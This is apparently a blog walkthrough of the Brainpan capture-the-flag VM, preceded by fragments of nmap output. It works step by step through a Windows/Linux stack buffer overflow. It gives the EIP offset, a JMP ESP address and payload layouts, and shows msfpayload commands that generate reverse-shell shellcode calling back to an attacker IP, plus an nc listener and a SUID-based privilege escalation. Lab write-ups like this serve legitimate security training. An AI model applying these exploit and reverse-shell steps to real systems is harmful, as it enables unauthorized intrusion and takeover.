SF:x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20_\|\
SF:x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x20\x20_
SF:\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPAN\x20_
SF:________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTER\x20T
SF:HE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\n\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20>>\x20");
MAC Address: 00:0C:29:10:01:C0 (VMware)
Only trash information :-) Now turn to dirbuster (as always).
Oh! In bin directory may be some binary file?
http://192.168.1.110:10000/bin/
I think that we should run our Windows 32-bit VM and download brainpan.exe on it. Probably brainpan.exe is running on our target on 9999 port.
I am pretty sure that it will be good idea when we run brainpan.exe via Immunity Debugger.
Our Windows VM has 191.168.1.101 IP address. We have to click twice on Start button.
My own fuzzer
Result:
We know that for us the Stack has three addresses EAX, EIP and ESP. We have to find where is located EIP. We verified that 900 A's cause overflow. We have overwritten via 4x"A", so
root@osboxes:~/brainpan1# ruby /usr/share/metasploit-framework/tools/pattern_create.rb 900and we have to edit our script using output from above command. Executing our script we have got following result:
We can see, that EIP has been overwritten via 35724134
root@osboxes:~/brainpan1# ruby /usr/share/metasploit-framework/tools/pattern_offset.rb 35724134Great! Now our payload will be as follow "A"*524 + "B"*4 + (900-524-4)*"C". Updated script gives following result:
[*] Exact match at offset 524
Excellent! We know where we should set up JMP ESP address and where our shellcode.
root@osboxes:/usr/share/metasploit-framework/tools# ./nasm_shell.rb
nasm > jmp esp
00000000 FFE4 jmp esp
OK! We also found module without ASLR protection.
!mona find -s "\xff\xe4" -m brainpan.exeNow, we find our JMP ESP address - 311712F3
So, our payload will be as follow: "A"*524+"\xf3\x12\x17\x31"+(900-524-4)*"C".
We have to also check "bad characters", let's generate all possible hex values.
root@osboxes:~/brainpan1# cat hex.pyOur temporary payload : "A"*524 + "B"*4 + (900-524-4-int(len(tail)))*"\x90"+tail, where
dict = "abcdef0123456789"
for i in dict:
for j in dict:
print "\\x"+i+j
tail:
\xaa\xab\xac\xad\xae\xaf\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xba\xbb\xbc\xbd\xbe\xbf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xca\xcb\xcc\xcd\xce\xcf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xda\xdb\xdc\xdd\xde\xdf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xea\xeb\xec\xed\xee\xef\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xfa\xfb\xfc\xfd\xfe\xff\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\x0a\x0b\x0c\x0d\x0e\x0f\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x1a\x1b\x1c\x1d\x1e\x1f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x2a\x2b\x2c\x2d\x2e\x2f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x3a\x3b\x3c\x3d\x3e\x3f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x4a\x4b\x4c\x4d\x4e\x4f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x5a\x5b\x5c\x5d\x5e\x5f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x6a\x6b\x6c\x6d\x6e\x6f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x7a\x7b\x7c\x7d\x7e\x7f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x8a\x8b\x8c\x8d\x8e\x8f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x9b\x9c\x9d\x9e\x9f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99The first of all we should remove from our payload \x00(null byte - break everything what is next) and \x90 (No Operation - do nothing)
Afer sending this part of payload, we can see in our Immunity Debugger that, everything is fine. Now, we generate out shell code
root@osboxes:~/brainpan1# msfpayload windows/shell_reverse_tcp LPORT=4444 LHOST=192.168.1.104 R | msfencode -e x86/shikata_ga_nai -b "\x00"We have to replace tail to generated buf, run
root@osboxes:~/brainpan1# nc -nlvp 4444and execute our script
Nice! We should generate new payload for our Linux target machine.
root@osboxes:~/brainpan1# msfpayload linux/x86/shell_reverse_tcp LPORT=4444 LHOST=192.168.1.104 R | msfencode -e x86/shikata_ga_nai -b "\x00"Execute our escript and BOOM!
We have got limited shell!
I verified and kernel of our target is not vulnerable to known exploit :-(, but look at some interesting
puck@brainpan:/$ find / -perm -4000 -type fOK, let's examine /usr/local/bin/validate.
[...]
/usr/sbin/pppd
/usr/local/bin/validate
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
find: `/lost+found': Permission denied
[...]
Have you though about Buffer Overflow again? Executing
sudo -lWe see that we don't have "extra" privileges. I have downloaded validate file via netcat to our machine.
We can see that we haven't got any result for JMP ESP, but we have got two records for CALL EAX. OK! Then we have expectaton that validate is vulnerable to Buffer Overflow.
Excellent! We know 200 of A's cause overflow our binary!
root@osboxes:~/brainpan1# ruby /usr/share/metasploit-framework/tools/pattern_create.rb 200
Amazing! We can determine "where" is EIP register.
root@osboxes:~/brainpan1# ruby /usr/share/metasploit-framework/tools/pattern_offset.rb 39644138Our payload will look as in screenshot below
[*] Exact match at offset 116
We have changed our privileges! TRY HARDER!
Game over!
Subscribe to:
Posts
(
Atom
)